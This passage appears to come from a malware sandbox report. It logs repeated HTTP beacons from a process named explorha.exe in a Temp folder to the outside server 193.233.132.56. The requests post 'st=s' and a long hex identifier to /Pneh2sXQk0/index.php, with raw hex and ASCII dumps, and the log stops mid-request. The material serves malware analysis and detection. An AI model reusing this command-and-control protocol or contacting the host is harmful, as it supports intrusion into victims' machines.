                                                                                                    Apr 19, 2024 04:26:26.686374903 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:26.931274891 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:26.931936979 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:27.186161041 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.449765193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:27.553057909 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:27.805710077 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:27.806471109 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:28.061599016 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    30192.168.2.449766193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:28.421542883 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:28.665414095 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:28.666110992 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:28.916958094 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    31192.168.2.449767193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:29.261404037 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:29.503365993 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:29.504183054 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:29.750348091 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    32192.168.2.449768193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:30.112767935 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:30.361001968 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:30.361669064 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:30.614500046 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    33192.168.2.449769193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:30.967915058 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:31.212212086 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:31.212990999 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:31.461462975 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    34192.168.2.449770193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:31.812819958 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:32.059587955 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:32.060372114 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:32.311256886 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    35192.168.2.449771193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:32.669044971 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:32.912678957 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:32.913467884 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:33.170676947 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    36192.168.2.449772193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:33.527873039 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:33.770442009 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:33.771461010 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:34.018942118 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    37192.168.2.449773193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:34.373291016 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:34.617108107 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:34.618045092 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:34.867587090 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    38192.168.2.449774193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:35.216742039 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:35.460585117 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:35.461343050 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
